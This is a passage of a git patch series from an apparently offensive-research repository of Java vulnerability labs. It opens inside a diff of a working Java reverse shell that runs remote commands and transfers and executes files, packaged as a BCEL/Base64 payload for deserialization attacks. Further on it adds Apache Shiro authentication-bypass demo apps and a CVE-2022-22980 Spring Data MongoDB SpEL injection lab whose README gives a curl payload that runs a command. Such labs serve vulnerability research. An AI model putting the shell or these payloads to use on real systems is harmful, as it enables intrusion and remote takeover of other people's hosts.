line.substring(8).trim(); + String[] cmd = line.split(" "); + String file = cmd[0]; + String ip = cmd[1]; + String port = cmd[2]; + byte[] bytes = Files.readAllBytes(Paths.get(file)); + Socket transferFileSocket = new Socket(ip, Integer.parseInt(port)); + transferFileSocket.getOutputStream().write(bytes); + transferFileSocket.getOutputStream().flush(); + transferFileSocket.getOutputStream().close(); + transferFileSocket.close(); + } else if (line.startsWith("upload")) { + line = line.substring(6).trim(); + String[] cmd = line.split(" "); + String file = cmd[0]; + String ip = cmd[1]; + String port = cmd[2]; + Socket transferFileSocket = new Socket(ip, Integer.parseInt(port)); + InputStream inputStream = transferFileSocket.getInputStream(); + Path path = Paths.get(file); + Files.copy(inputStream, path); + if (Files.exists(path)) { + File toSetFile = path.toFile(); + toSetFile.setExecutable(true); + toSetFile.setReadable(true); + toSetFile.setWritable(true); + } + inputStream.close(); + transferFileSocket.close(); + } else { + pro = Runtime.getRuntime().exec(line); + } + } catch (Exception e) { + bufferedWriter.write(e.getMessage()); + bufferedWriter.newLine(); + bufferedWriter.flush(); + } + if (pro == null) { + continue; + } - } catch (IOException e) {} + new ReverseShell(pro.getInputStream(), socket.getOutputStream()); + new ReverseShell(pro.getErrorStream(), socket.getOutputStream()); } + + } catch (IOException e) { + } } + } - public static void main(String[] args) throws Exception { - InputStream inputStream = ReverseShell.class.getResourceAsStream("ReverseShell.class"); - byte[] bytes = new byte[inputStream.available()]; - inputStream.read(bytes); - String code = Utility.encode(bytes, true); - System.out.println(Base64.getEncoder().encodeToString(("$$BCEL$$" + code).getBytes())); + public static void main(String[] args) throws Exception { + InputStream inputStream = ReverseShell.class.getResourceAsStream("ReverseShell.class"); + byte[] bytes = new byte[inputStream.available()]; + inputStream.read(bytes); + String code = Utility.encode(bytes, true); + System.out.println(Base64.getEncoder().encodeToString(("$$BCEL$$" + code).getBytes())); // new ReverseShell("127.0.0.1", 12345); - } + } } \ No newline at end of file diff --git a/pom.xml b/pom.xml index 2a018d87..e09a4391 100644 --- a/pom.xml +++ b/pom.xml @@ -1,6 +1,7 @@ - 4.0.0 @@ -27,7 +28,6 @@ nexus apache-poi java-compile - auth-bypass(shiro=1.7.1) learn-java-bug @@ -56,56 +56,45 @@ - - - - - + + + + + - - - - - - - - - - - + + + + + - - - - - - - - - - - - - - - - - - - - - - - - - - - - + + + + + + + + + + + + + + + + + + + + + + + diff --git a/shiro/auth-bypass(shiro<=1.4.1)/pom.xml b/shiro/auth-bypass-shiro-1-4-1/pom.xml similarity index 96% rename from shiro/auth-bypass(shiro<=1.4.1)/pom.xml rename to shiro/auth-bypass-shiro-1-4-1/pom.xml index 9e5ff66b..18215b3a 100644 --- a/shiro/auth-bypass(shiro<=1.4.1)/pom.xml +++ b/shiro/auth-bypass-shiro-1-4-1/pom.xml @@ -10,7 +10,7 @@ 4.0.0 - auth-bypass-shiro-1.4.1 + auth-bypass-shiro-1-4-1 diff --git a/shiro/auth-bypass(shiro<1.5.2)/src/main/java/com/threedr3am/bug/shiro/bypass/auth/Application.java b/shiro/auth-bypass-shiro-1-4-1/src/main/java/com/threedr3am/bug/shiro/bypass/auth/Application.java similarity index 100% rename from shiro/auth-bypass(shiro<1.5.2)/src/main/java/com/threedr3am/bug/shiro/bypass/auth/Application.java rename to shiro/auth-bypass-shiro-1-4-1/src/main/java/com/threedr3am/bug/shiro/bypass/auth/Application.java diff --git a/shiro/auth-bypass(shiro<=1.4.1)/src/main/java/com/threedr3am/bug/shiro/bypass/auth/config/ShiroConfig.java b/shiro/auth-bypass-shiro-1-4-1/src/main/java/com/threedr3am/bug/shiro/bypass/auth/config/ShiroConfig.java similarity index 100% rename from shiro/auth-bypass(shiro<=1.4.1)/src/main/java/com/threedr3am/bug/shiro/bypass/auth/config/ShiroConfig.java rename to shiro/auth-bypass-shiro-1-4-1/src/main/java/com/threedr3am/bug/shiro/bypass/auth/config/ShiroConfig.java diff --git a/shiro/auth-bypass(shiro<=1.4.1)/src/main/java/com/threedr3am/bug/shiro/bypass/auth/controller/BypassTestController.java b/shiro/auth-bypass-shiro-1-4-1/src/main/java/com/threedr3am/bug/shiro/bypass/auth/controller/BypassTestController.java similarity index 100% rename from shiro/auth-bypass(shiro<=1.4.1)/src/main/java/com/threedr3am/bug/shiro/bypass/auth/controller/BypassTestController.java rename to shiro/auth-bypass-shiro-1-4-1/src/main/java/com/threedr3am/bug/shiro/bypass/auth/controller/BypassTestController.java diff --git a/shiro/auth-bypass(shiro<1.5.2)/src/main/java/com/threedr3am/bug/shiro/bypass/auth/controller/LoginController.java b/shiro/auth-bypass-shiro-1-4-1/src/main/java/com/threedr3am/bug/shiro/bypass/auth/controller/LoginController.java similarity index 100% rename from shiro/auth-bypass(shiro<1.5.2)/src/main/java/com/threedr3am/bug/shiro/bypass/auth/controller/LoginController.java rename to shiro/auth-bypass-shiro-1-4-1/src/main/java/com/threedr3am/bug/shiro/bypass/auth/controller/LoginController.java diff --git a/shiro/auth-bypass(shiro<1.5.2)/src/main/java/com/threedr3am/bug/shiro/bypass/auth/realm/MyRealm.java b/shiro/auth-bypass-shiro-1-4-1/src/main/java/com/threedr3am/bug/shiro/bypass/auth/realm/MyRealm.java similarity index 100% rename from shiro/auth-bypass(shiro<1.5.2)/src/main/java/com/threedr3am/bug/shiro/bypass/auth/realm/MyRealm.java rename to shiro/auth-bypass-shiro-1-4-1/src/main/java/com/threedr3am/bug/shiro/bypass/auth/realm/MyRealm.java diff --git a/shiro/auth-bypass(shiro<1.5.2)/pom.xml b/shiro/auth-bypass-shiro-1-5-1/pom.xml similarity index 95% rename from shiro/auth-bypass(shiro<1.5.2)/pom.xml rename to shiro/auth-bypass-shiro-1-5-1/pom.xml index ae213b03..92fb2643 100644 --- a/shiro/auth-bypass(shiro<1.5.2)/pom.xml +++ b/shiro/auth-bypass-shiro-1-5-1/pom.xml @@ -10,7 +10,7 @@ 4.0.0 - auth-bypass-cve-2020-1957 + auth-bypass-shiro-1-5-1 diff --git a/shiro/auth-bypass(shiro<=1.4.1)/src/main/java/com/threedr3am/bug/shiro/bypass/auth/Application.java b/shiro/auth-bypass-shiro-1-5-1/src/main/java/com/threedr3am/bug/shiro/bypass/auth/Application.java similarity index 100% rename from shiro/auth-bypass(shiro<=1.4.1)/src/main/java/com/threedr3am/bug/shiro/bypass/auth/Application.java rename to shiro/auth-bypass-shiro-1-5-1/src/main/java/com/threedr3am/bug/shiro/bypass/auth/Application.java diff --git a/shiro/auth-bypass(shiro<1.5.2)/src/main/java/com/threedr3am/bug/shiro/bypass/auth/config/ShiroConfig.java b/shiro/auth-bypass-shiro-1-5-1/src/main/java/com/threedr3am/bug/shiro/bypass/auth/config/ShiroConfig.java similarity index 100% rename from shiro/auth-bypass(shiro<1.5.2)/src/main/java/com/threedr3am/bug/shiro/bypass/auth/config/ShiroConfig.java rename to shiro/auth-bypass-shiro-1-5-1/src/main/java/com/threedr3am/bug/shiro/bypass/auth/config/ShiroConfig.java diff --git a/shiro/auth-bypass(shiro<1.5.2)/src/main/java/com/threedr3am/bug/shiro/bypass/auth/controller/BypassTestController.java b/shiro/auth-bypass-shiro-1-5-1/src/main/java/com/threedr3am/bug/shiro/bypass/auth/controller/BypassTestController.java similarity index 100% rename from shiro/auth-bypass(shiro<1.5.2)/src/main/java/com/threedr3am/bug/shiro/bypass/auth/controller/BypassTestController.java rename to shiro/auth-bypass-shiro-1-5-1/src/main/java/com/threedr3am/bug/shiro/bypass/auth/controller/BypassTestController.java diff --git a/shiro/auth-bypass(shiro<=1.4.1)/src/main/java/com/threedr3am/bug/shiro/bypass/auth/controller/LoginController.java b/shiro/auth-bypass-shiro-1-5-1/src/main/java/com/threedr3am/bug/shiro/bypass/auth/controller/LoginController.java similarity index 100% rename from shiro/auth-bypass(shiro<=1.4.1)/src/main/java/com/threedr3am/bug/shiro/bypass/auth/controller/LoginController.java rename to shiro/auth-bypass-shiro-1-5-1/src/main/java/com/threedr3am/bug/shiro/bypass/auth/controller/LoginController.java diff --git a/shiro/auth-bypass(shiro<=1.4.1)/src/main/java/com/threedr3am/bug/shiro/bypass/auth/realm/MyRealm.java b/shiro/auth-bypass-shiro-1-5-1/src/main/java/com/threedr3am/bug/shiro/bypass/auth/realm/MyRealm.java similarity index 100% rename from shiro/auth-bypass(shiro<=1.4.1)/src/main/java/com/threedr3am/bug/shiro/bypass/auth/realm/MyRealm.java rename to shiro/auth-bypass-shiro-1-5-1/src/main/java/com/threedr3am/bug/shiro/bypass/auth/realm/MyRealm.java diff --git a/shiro/auth-bypass(shiro<1.5.2)/src/main/resources/application.yml b/shiro/auth-bypass-shiro-1-5-1/src/main/resources/application.yml similarity index 100% rename from shiro/auth-bypass(shiro<1.5.2)/src/main/resources/application.yml rename to shiro/auth-bypass-shiro-1-5-1/src/main/resources/application.yml diff --git a/shiro/auth-bypass(shiro<1.5.3)/pom.xml b/shiro/auth-bypass-shiro-1-5-3/pom.xml similarity index 94% rename from shiro/auth-bypass(shiro<1.5.3)/pom.xml rename to shiro/auth-bypass-shiro-1-5-3/pom.xml index 386fe8d0..197a9891 100644 --- a/shiro/auth-bypass(shiro<1.5.3)/pom.xml +++ b/shiro/auth-bypass-shiro-1-5-3/pom.xml @@ -10,7 +10,7 @@ 4.0.0 - auth-bypass-cve-2020-11989 + auth-bypass-shiro-1-5-3 diff --git a/shiro/auth-bypass(shiro<1.5.3)/src/main/java/me/threedr3am/bug/shiro/bypass/auth/Application.java b/shiro/auth-bypass-shiro-1-5-3/src/main/java/me/threedr3am/bug/shiro/bypass/auth/Application.java similarity index 100% rename from shiro/auth-bypass(shiro<1.5.3)/src/main/java/me/threedr3am/bug/shiro/bypass/auth/Application.java rename to shiro/auth-bypass-shiro-1-5-3/src/main/java/me/threedr3am/bug/shiro/bypass/auth/Application.java diff --git a/shiro/auth-bypass(shiro<1.5.3)/src/main/java/me/threedr3am/bug/shiro/bypass/auth/config/ShiroConfig.java b/shiro/auth-bypass-shiro-1-5-3/src/main/java/me/threedr3am/bug/shiro/bypass/auth/config/ShiroConfig.java similarity index 100% rename from shiro/auth-bypass(shiro<1.5.3)/src/main/java/me/threedr3am/bug/shiro/bypass/auth/config/ShiroConfig.java rename to shiro/auth-bypass-shiro-1-5-3/src/main/java/me/threedr3am/bug/shiro/bypass/auth/config/ShiroConfig.java diff --git a/shiro/auth-bypass(shiro<1.5.3)/src/main/java/me/threedr3am/bug/shiro/bypass/auth/controller/BypassTestController.java b/shiro/auth-bypass-shiro-1-5-3/src/main/java/me/threedr3am/bug/shiro/bypass/auth/controller/BypassTestController.java similarity index 100% rename from shiro/auth-bypass(shiro<1.5.3)/src/main/java/me/threedr3am/bug/shiro/bypass/auth/controller/BypassTestController.java rename to shiro/auth-bypass-shiro-1-5-3/src/main/java/me/threedr3am/bug/shiro/bypass/auth/controller/BypassTestController.java diff --git a/shiro/auth-bypass(shiro<1.5.3)/src/main/java/me/threedr3am/bug/shiro/bypass/auth/controller/LoginController.java b/shiro/auth-bypass-shiro-1-5-3/src/main/java/me/threedr3am/bug/shiro/bypass/auth/controller/LoginController.java similarity index 100% rename from shiro/auth-bypass(shiro<1.5.3)/src/main/java/me/threedr3am/bug/shiro/bypass/auth/controller/LoginController.java rename to shiro/auth-bypass-shiro-1-5-3/src/main/java/me/threedr3am/bug/shiro/bypass/auth/controller/LoginController.java diff --git a/shiro/auth-bypass(shiro<1.5.3)/src/main/java/me/threedr3am/bug/shiro/bypass/auth/realm/MyRealm.java b/shiro/auth-bypass-shiro-1-5-3/src/main/java/me/threedr3am/bug/shiro/bypass/auth/realm/MyRealm.java similarity index 100% rename from shiro/auth-bypass(shiro<1.5.3)/src/main/java/me/threedr3am/bug/shiro/bypass/auth/realm/MyRealm.java rename to shiro/auth-bypass-shiro-1-5-3/src/main/java/me/threedr3am/bug/shiro/bypass/auth/realm/MyRealm.java diff --git a/shiro/auth-bypass(shiro<1.5.3)/src/main/resources/application.yml b/shiro/auth-bypass-shiro-1-5-3/src/main/resources/application.yml similarity index 100% rename from shiro/auth-bypass(shiro<1.5.3)/src/main/resources/application.yml rename to shiro/auth-bypass-shiro-1-5-3/src/main/resources/application.yml diff --git a/shiro/auth-bypass(shiro=1.7.1)/pom.xml b/shiro/auth-bypass-shiro-1-7-1/pom.xml similarity index 95% rename from shiro/auth-bypass(shiro=1.7.1)/pom.xml rename to shiro/auth-bypass-shiro-1-7-1/pom.xml index 8a78d05c..079c2a0a 100644 --- a/shiro/auth-bypass(shiro=1.7.1)/pom.xml +++ b/shiro/auth-bypass-shiro-1-7-1/pom.xml @@ -10,7 +10,7 @@ 4.0.0 - auth-bypass(shiro=1.7.1) + auth-bypass-shiro-1-7-1 8 diff --git a/shiro/auth-bypass(shiro=1.7.1)/src/main/java/me/threedr3am/bug/shiro/bypass/auth/Application.java b/shiro/auth-bypass-shiro-1-7-1/src/main/java/me/threedr3am/bug/shiro/bypass/auth/Application.java similarity index 100% rename from shiro/auth-bypass(shiro=1.7.1)/src/main/java/me/threedr3am/bug/shiro/bypass/auth/Application.java rename to shiro/auth-bypass-shiro-1-7-1/src/main/java/me/threedr3am/bug/shiro/bypass/auth/Application.java diff --git a/shiro/auth-bypass(shiro=1.7.1)/src/main/java/me/threedr3am/bug/shiro/bypass/auth/config/ShiroConfig.java b/shiro/auth-bypass-shiro-1-7-1/src/main/java/me/threedr3am/bug/shiro/bypass/auth/config/ShiroConfig.java similarity index 100% rename from shiro/auth-bypass(shiro=1.7.1)/src/main/java/me/threedr3am/bug/shiro/bypass/auth/config/ShiroConfig.java rename to shiro/auth-bypass-shiro-1-7-1/src/main/java/me/threedr3am/bug/shiro/bypass/auth/config/ShiroConfig.java diff --git a/shiro/auth-bypass(shiro=1.7.1)/src/main/java/me/threedr3am/bug/shiro/bypass/auth/controller/BypassTestController.java b/shiro/auth-bypass-shiro-1-7-1/src/main/java/me/threedr3am/bug/shiro/bypass/auth/controller/BypassTestController.java similarity index 100% rename from shiro/auth-bypass(shiro=1.7.1)/src/main/java/me/threedr3am/bug/shiro/bypass/auth/controller/BypassTestController.java rename to shiro/auth-bypass-shiro-1-7-1/src/main/java/me/threedr3am/bug/shiro/bypass/auth/controller/BypassTestController.java diff --git a/shiro/auth-bypass(shiro=1.7.1)/src/main/java/me/threedr3am/bug/shiro/bypass/auth/controller/LoginController.java b/shiro/auth-bypass-shiro-1-7-1/src/main/java/me/threedr3am/bug/shiro/bypass/auth/controller/LoginController.java similarity index 100% rename from shiro/auth-bypass(shiro=1.7.1)/src/main/java/me/threedr3am/bug/shiro/bypass/auth/controller/LoginController.java rename to shiro/auth-bypass-shiro-1-7-1/src/main/java/me/threedr3am/bug/shiro/bypass/auth/controller/LoginController.java diff --git a/shiro/auth-bypass(shiro=1.7.1)/src/main/java/me/threedr3am/bug/shiro/bypass/auth/realm/MyRealm.java b/shiro/auth-bypass-shiro-1-7-1/src/main/java/me/threedr3am/bug/shiro/bypass/auth/realm/MyRealm.java similarity index 100% rename from shiro/auth-bypass(shiro=1.7.1)/src/main/java/me/threedr3am/bug/shiro/bypass/auth/realm/MyRealm.java rename to shiro/auth-bypass-shiro-1-7-1/src/main/java/me/threedr3am/bug/shiro/bypass/auth/realm/MyRealm.java diff --git a/shiro/auth-bypass-shiro-1-8-0/pom.xml b/shiro/auth-bypass-shiro-1-8-0/pom.xml new file mode 100644 index 00000000..2de5d4ca --- /dev/null +++ b/shiro/auth-bypass-shiro-1-8-0/pom.xml @@ -0,0 +1,38 @@ + + + + org.springframework.boot + spring-boot-starter-parent + 1.5.22.RELEASE + + + 4.0.0 + + auth-bypass-shiro-1-8-0 + + + 8 + 8 + + + + + org.springframework.boot + spring-boot-starter-web + + + + org.apache.shiro + shiro-web + 1.8.0 + + + org.apache.shiro + shiro-spring + 1.8.0 + + + + \ No newline at end of file diff --git a/shiro/auth-bypass-shiro-1-8-0/src/main/java/me/threedr3am/bug/shiro/bypass/auth/Application.java b/shiro/auth-bypass-shiro-1-8-0/src/main/java/me/threedr3am/bug/shiro/bypass/auth/Application.java new file mode 100644 index 00000000..a134e7a3 --- /dev/null +++ b/shiro/auth-bypass-shiro-1-8-0/src/main/java/me/threedr3am/bug/shiro/bypass/auth/Application.java @@ -0,0 +1,13 @@ +package me.threedr3am.bug.shiro.bypass.auth; + +import org.springframework.boot.SpringApplication; +import org.springframework.boot.autoconfigure.SpringBootApplication; + +@SpringBootApplication +public class Application { + + public static void main(String[] args) { + SpringApplication.run(Application.class, args); + } + +} \ No newline at end of file diff --git a/shiro/auth-bypass-shiro-1-8-0/src/main/java/me/threedr3am/bug/shiro/bypass/auth/config/ShiroConfig.java b/shiro/auth-bypass-shiro-1-8-0/src/main/java/me/threedr3am/bug/shiro/bypass/auth/config/ShiroConfig.java new file mode 100644 index 00000000..90e77074 --- /dev/null +++ b/shiro/auth-bypass-shiro-1-8-0/src/main/java/me/threedr3am/bug/shiro/bypass/auth/config/ShiroConfig.java @@ -0,0 +1,39 @@ +package me.threedr3am.bug.shiro.bypass.auth.config; + +import me.threedr3am.bug.shiro.bypass.auth.realm.MyRealm; +import org.apache.shiro.mgt.SecurityManager; +import org.apache.shiro.spring.web.ShiroFilterFactoryBean; +import org.apache.shiro.web.mgt.DefaultWebSecurityManager; +import org.springframework.context.annotation.Bean; +import org.springframework.context.annotation.Configuration; + +import java.util.LinkedHashMap; +import java.util.Map; + +/** + * @author threedr3am + */ +@Configuration +public class ShiroConfig { + @Bean + MyRealm myRealm() { + return new MyRealm(); + } + + @Bean + SecurityManager securityManager() { + DefaultWebSecurityManager manager = new DefaultWebSecurityManager(); + manager.setRealm(myRealm()); + return manager; + } + + @Bean + ShiroFilterFactoryBean shiroFilterFactoryBean() { + ShiroFilterFactoryBean bean = new ShiroFilterFactoryBean(); + bean.setSecurityManager(securityManager()); + Map map = new LinkedHashMap(); + map.put("/bypass/*/index", "authc"); + bean.setFilterChainDefinitionMap(map); + return bean; + } +} diff --git a/shiro/auth-bypass-shiro-1-8-0/src/main/java/me/threedr3am/bug/shiro/bypass/auth/controller/BypassTestController.java b/shiro/auth-bypass-shiro-1-8-0/src/main/java/me/threedr3am/bug/shiro/bypass/auth/controller/BypassTestController.java new file mode 100644 index 00000000..91766574 --- /dev/null +++ b/shiro/auth-bypass-shiro-1-8-0/src/main/java/me/threedr3am/bug/shiro/bypass/auth/controller/BypassTestController.java @@ -0,0 +1,22 @@ +package me.threedr3am.bug.shiro.bypass.auth.controller; + +import org.springframework.web.bind.annotation.*; + +/** + * + * curl http://127.0.0.1:8080/bypass/threedr3am/index.html + * + * @author threedr3am + */ +@RestController +public class BypassTestController { + + /** + * @return + */ + @RequestMapping(value = "/bypass/{id}/index", method = RequestMethod.GET) + public String bypass(@PathVariable("id") String id) { + return "bypass -> " + id; + } + +} diff --git a/shiro/auth-bypass-shiro-1-8-0/src/main/java/me/threedr3am/bug/shiro/bypass/auth/controller/LoginController.java b/shiro/auth-bypass-shiro-1-8-0/src/main/java/me/threedr3am/bug/shiro/bypass/auth/controller/LoginController.java new file mode 100644 index 00000000..e7dd4586 --- /dev/null +++ b/shiro/auth-bypass-shiro-1-8-0/src/main/java/me/threedr3am/bug/shiro/bypass/auth/controller/LoginController.java @@ -0,0 +1,29 @@ +package me.threedr3am.bug.shiro.bypass.auth.controller; + +import org.apache.shiro.SecurityUtils; +import org.apache.shiro.authc.AuthenticationException; +import org.apache.shiro.authc.UsernamePasswordToken; +import org.apache.shiro.subject.Subject; +import org.springframework.web.bind.annotation.RequestMapping; +import org.springframework.web.bind.annotation.RequestMethod; +import org.springframework.web.bind.annotation.RestController; + +/** + * @author threedr3am + */ +@RestController +public class LoginController { + + @RequestMapping(value = "/login", method = RequestMethod.POST) + public String login(String username, String password) { + Subject subject = SecurityUtils.getSubject(); + try { + subject.login(new UsernamePasswordToken(username, password)); + return "登录成功!"; + } catch (AuthenticationException e) { + e.printStackTrace(); + return "登录失败!"; + } + + } +} diff --git a/shiro/auth-bypass-shiro-1-8-0/src/main/java/me/threedr3am/bug/shiro/bypass/auth/realm/MyRealm.java b/shiro/auth-bypass-shiro-1-8-0/src/main/java/me/threedr3am/bug/shiro/bypass/auth/realm/MyRealm.java new file mode 100644 index 00000000..58d2897a --- /dev/null +++ b/shiro/auth-bypass-shiro-1-8-0/src/main/java/me/threedr3am/bug/shiro/bypass/auth/realm/MyRealm.java @@ -0,0 +1,24 @@ +package me.threedr3am.bug.shiro.bypass.auth.realm; + +import org.apache.shiro.authc.*; +import org.apache.shiro.authz.AuthorizationInfo; +import org.apache.shiro.realm.AuthorizingRealm; +import org.apache.shiro.subject.PrincipalCollection; + +/** + * @author threedr3am + */ +public class MyRealm extends AuthorizingRealm { + @Override + protected AuthorizationInfo doGetAuthorizationInfo(PrincipalCollection principals) { + return null; + } + @Override + protected AuthenticationInfo doGetAuthenticationInfo(AuthenticationToken token) throws AuthenticationException { + String username = (String) token.getPrincipal(); + if (!"threedr3am".equals(username)) { + throw new UnknownAccountException("账户不存在!"); + } + return new SimpleAuthenticationInfo(username, "123456", getName()); + } +} diff --git a/shiro/pom.xml b/shiro/pom.xml index f108c2d1..1913fa2f 100644 --- a/shiro/pom.xml +++ b/shiro/pom.xml @@ -12,9 +12,11 @@ shiro pom - - auth-bypass(shiro=1.7.1) - auth-bypass-shiro-1.4.1 + auth-bypass-shiro-1-5-3 + auth-bypass-shiro-1-5-1 + auth-bypass-shiro-1-7-1 + auth-bypass-shiro-1-4-1 + auth-bypass-shiro-1-8-0 diff --git a/spring/pom.xml b/spring/pom.xml index 71ead017..680c8649 100644 --- a/spring/pom.xml +++ b/spring/pom.xml @@ -14,6 +14,7 @@ spring-boot-actuator-bug spring-cloud-config-server-CVE-2020-5410 + spring-data-mongodb-spel-CVE-2022-22980 diff --git a/spring/spring-data-mongodb-spel-CVE-2022-22980/README.md b/spring/spring-data-mongodb-spel-CVE-2022-22980/README.md new file mode 100644 index 00000000..4b533899 --- /dev/null +++ b/spring/spring-data-mongodb-spel-CVE-2022-22980/README.md @@ -0,0 +1,15 @@ +## CVE-2022-22980: Spring Data MongoDB SpEL Expression injection vulnerability through annotated repository query methods + +### 1. Run Java Server(not need MongoDB Server) +``` +com.threedr3am.bug.spring.data.mongodb.Application.main +``` + +### 2. payload +``` +curl --location --request POST 'http://127.0.0.1:8080/demo' \ +--header 'Content-Type: application/x-www-form-urlencoded' \ +--data-urlencode 'keyword=T(java.lang.String).forName('\''java.lang.Runtime'\'').getRuntime().exec('\''/System/Applications/Calculator.app/Contents/MacOS/Calculator'\'')' +``` + + diff --git a/spring/spring-data-mongodb-spel-CVE-2022-22980/pom.xml b/spring/spring-data-mongodb-spel-CVE-2022-22980/pom.xml new file mode 100644 index 00000000..b8648693 --- /dev/null +++ b/spring/spring-data-mongodb-spel-CVE-2022-22980/pom.xml @@ -0,0 +1,39 @@ + + + + org.springframework.boot + spring-boot-starter-parent + 2.6.8 + + 4.0.0 + + spring-data-mongodb-spel-CVE-2022-22980 + + + 8 + 8 + + + + + org.springframework.boot + spring-boot-starter-web + + + + + + + org.springframework.boot + spring-boot-starter-data-mongodb + + + + + + + + + \ No newline at end of file diff --git a/spring/spring-data-mongodb-spel-CVE-2022-22980/src/main/java/com/threedr3am/bug/spring/data/mongodb/Application.java b/spring/spring-data-mongodb-spel-CVE-2022-22980/src/main/java/com/threedr3am/bug/spring/data/mongodb/Application.java new file mode 100644 index 00000000..711c72a6 --- /dev/null +++ b/spring/spring-data-mongodb-spel-CVE-2022-22980/src/main/java/com/threedr3am/bug/spring/data/mongodb/Application.java @@ -0,0 +1,15 @@ +package com.threedr3am.bug.spring.data.mongodb; + +import org.springframework.boot.SpringApplication; +import org.springframework.boot.autoconfigure.SpringBootApplication; + +/** + * @author threedr3am + */ +@SpringBootApplication +public class Application { + + public static void main(String[] args) { + SpringApplication.run(Application.class, args); + } +} diff --git a/spring/spring-data-mongodb-spel-CVE-2022-22980/src/main/java/com/threedr3am/bug/spring/data/mongodb/controller/DemoController.java b/spring/spring-data-mongodb-spel-CVE-2022-22980/src/main/java/com/threedr3am/bug/spring/data/mongodb/controller/DemoController.java new file mode 100644 index 00000000..5377d465 --- /dev/null +++ b/spring/spring-data-mongodb-spel-CVE-2022-22980/src/main/java/com/threedr3am/bug/spring/data/mongodb/controller/DemoController.java @@ -0,0 +1,22 @@ +package com.threedr3am.bug.spring.data.mongodb.controller; + +import com.threedr3am.bug.spring.data.mongodb.repository.DemoRepository; +import java.util.List; +import org.springframework.web.bind.annotation.RequestMapping; +import org.springframework.web.bind.annotation.RequestParam; +import org.springframework.web.bind.annotation.RestController; + +@RestController +public class DemoController { + + private final DemoRepository demoRepository; + + public DemoController(DemoRepository demoRepository) { + this.demoRepository = demoRepository; + } + + @RequestMapping(value = "/demo") + public List demo(@RequestParam(name = "keyword") String keyword) { + return demoRepository.findAllByIdLike(keyword); + } +} diff --git a/spring/spring-data-mongodb-spel-CVE-2022-22980/src/main/java/com/threedr3am/bug/spring/data/mongodb/entity/Demo.java b/spring/spring-data-mongodb-spel-CVE-2022-22980/src/main/java/com/threedr3am/bug/spring/data/mongodb/entity/Demo.java new file mode 100644 index 00000000..e4674ff0 --- /dev/null +++ b/spring/spring-data-mongodb-spel-CVE-2022-22980/src/main/java/com/threedr3am/bug/spring/data/mongodb/entity/Demo.java @@ -0,0 +1,9 @@ +package com.threedr3am.bug.spring.data.mongodb.entity; + +import org.springframework.data.mongodb.core.mapping.MongoId; + +public class Demo { + + @MongoId + private String id; +} diff --git a/spring/spring-data-mongodb-spel-CVE-2022-22980/src/main/java/com/threedr3am/bug/spring/data/mongodb/repository/DemoRepository.java b/spring/spring-data-mongodb-spel-CVE-2022-22980/src/main/java/com/threedr3am/bug/spring/data/mongodb/repository/DemoRepository.java new file mode 100644 index 00000000..a59fbae2 --- /dev/null +++ b/spring/spring-data-mongodb-spel-CVE-2022-22980/src/main/java/com/threedr3am/bug/spring/data/mongodb/repository/DemoRepository.java @@ -0,0 +1,13 @@ +package com.threedr3am.bug.spring.data.mongodb.repository; + +import com.threedr3am.bug.spring.data.mongodb.entity.Demo; +import java.util.List; +import org.springframework.data.mongodb.repository.Query; +import org.springframework.data.repository.Repository; + +@org.springframework.stereotype.Repository +public interface DemoRepository extends Repository { + + @Query("{ arg0 : :#{?0} }") + List findAllByIdLike(String keyword); +} diff --git a/spring/spring-data-mongodb-spel-CVE-2022-22980/src/main/resources/application.yml b/spring/spring-data-mongodb-spel-CVE-2022-22980/src/main/resources/application.yml new file mode 100644 index 00000000..5525fd44 --- /dev/null +++ b/spring/spring-data-mongodb-spel-CVE-2022-22980/src/main/resources/application.yml @@ -0,0 +1,8 @@ +#spring: +# data: +# mongodb: +# host: 127.0.0.1 +# port: 27017 +# database: test +# username: admin +# password: 123456 \ No newline at end of file From b5e8427aea7b7d370953c452280ade27394a14ca Mon Sep 17 00:00:00 2001 From: threedr3am <929811313@qq.com> Date: Tue, 21 Jun 2022 20:54:58 +0800 Subject: [PATCH 3/5] add Query --- .../bug/spring/data/mongodb/repository/DemoRepository.java | 5 ++++- 1 file changed, 4 insertions(+), 1 deletion(-) diff --git a/spring/spring-data-mongodb-spel-CVE-2022-22980/src/main/java/com/threedr3am/bug/spring/data/mongodb/repository/DemoRepository.java b/spring/spring-data-mongodb-spel-CVE-2022-22980/src/main/java/com/threedr3am/bug/spring/data/mongodb/repository/DemoRepository.java index a59fbae2..aa1f6edc 100644 --- a/spring/spring-data-mongodb-spel-CVE-2022-22980/src/main/java/com/threedr3am/bug/spring/data/mongodb/repository/DemoRepository.java +++ b/spring/spring-data-mongodb-spel-CVE-2022-22980/src/main/java/com/threedr3am/bug/spring/data/mongodb/repository/DemoRepository.java @@ -8,6 +8,9 @@ @org.springframework.stereotype.Repository public interface DemoRepository extends Repository { - @Query("{ arg0 : :#{?0} }") + @Query("{ id : :#{?0} }") List findAllByIdLike(String keyword); + + @Query("{ id : ?#{?0} }") + List findAllByIdLike2(String keyword); } From 65a6bd4f72c985b4f31821a732e7da39050910ac Mon Sep 17 00:00:00 2001 From: threedr3am <929811313@qq.com> Date: Fri, 23 Feb 2024 01:04:29 +0800 Subject: [PATCH 4/5] add CVE-2024-22243 & optimize project --- apache-poi/pom.xml | 2 +- .../dubbo-hessian2-safe-reinforcement/pom.xml | 1 - fastjson/pom.xml | 11 +++ jackson/pom.xml | 2 +- pom.xml | 83 ------------------- shiro/auth-bypass-shiro-1-4-1/pom.xml | 1 - shiro/auth-bypass-shiro-1-5-1/pom.xml | 1 - shiro/auth-bypass-shiro-1-5-3/pom.xml | 1 - shiro/auth-bypass-shiro-1-7-1/pom.xml | 1 - shiro/auth-bypass-shiro-1-8-0/pom.xml | 1 - spring/pom.xml | 1 + .../pom.xml | 1 - .../pom.xml | 1 - .../pom.xml | 1 - spring/spring-uricomponentsbuilder/pom.xml | 27 ++++++ .../bug/spring/uricomponentsbuilder/Main.java | 15 ++++ .../controller/OAuthController.java | 74 +++++++++++++++++ 17 files changed, 130 insertions(+), 94 deletions(-) create mode 100644 spring/spring-uricomponentsbuilder/pom.xml create mode 100644 spring/spring-uricomponentsbuilder/src/main/java/com/threedr3am/bug/spring/uricomponentsbuilder/Main.java create mode 100644 spring/spring-uricomponentsbuilder/src/main/java/com/threedr3am/bug/spring/uricomponentsbuilder/controller/OAuthController.java diff --git a/apache-poi/pom.xml b/apache-poi/pom.xml index 5bc7ea1f..99da6a52 100644 --- a/apache-poi/pom.xml +++ b/apache-poi/pom.xml @@ -9,7 +9,7 @@ 4.0.0 - apache-com.threedr3am.bug.poi + apache-poi pom cve-2014-3529 diff --git a/dubbo/dubbo-hessian2-safe-reinforcement/pom.xml 